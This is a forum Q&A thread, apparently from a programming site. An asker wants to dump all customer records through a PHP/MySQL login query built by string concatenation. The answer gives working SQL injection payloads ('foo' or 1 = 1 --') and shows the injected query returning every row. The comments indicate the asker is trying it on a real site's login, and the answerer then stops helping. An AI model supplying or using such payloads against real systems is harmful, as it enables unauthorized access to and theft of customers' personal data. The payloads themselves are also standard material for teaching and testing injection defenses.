# how to SQL inject this?

Tags: mysql, sql, sql-injection, where-clause

```
mysql_select_db($database_db, $db);
query_user = "SELECT * FROM customers WHERE email = '$login'";
user = mysql_query($query_user, $db) or die(mysql_error());
row_user = mysql_fetch_assoc($user);
totalRows_user = mysql_num_rows($user);
```

i need some help i know this might be injectable i need to bring up all the customer details within    the database. please help.

Comment: Which programming language do you use for this?

Answer (score 2):

This would work:

```
foo' or 1 = 1 --
```

Or, since you are running MySQL:

```
foo' or 1 --
```

When concatenated in your query string, this produces:

```
SELECT *
FROM customers 
WHERE email = 'foo' or 1 = 1 -- '
```

Regardless of the result of the first condition, the second condition evaluates as true, so the query returns all rows in the table.

Comment: What will happen?

Comment: it says password required

Comment: what do i put in the password section

Comment: @AshleyBishton: I am not helping you hacking some random site. You asked a theoretical question that I answered for the sake of knowledge.